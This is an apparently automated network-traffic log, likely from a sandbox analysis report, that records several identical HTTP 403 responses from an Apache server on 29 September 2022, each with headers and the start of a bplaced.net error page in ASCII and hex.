                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon" h
                                                                                                                                                Sep 29, 2022 14:51:09.248409033 CEST14683INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:09 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=114
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:51:10.109971046 CEST14691INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:10 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=108
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:51:11.153001070 CEST14699INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:11 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=108
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:51:12.159746885 CEST14707INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:12 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=110
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:51:13.186709881 CEST14715INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:13 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=106
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
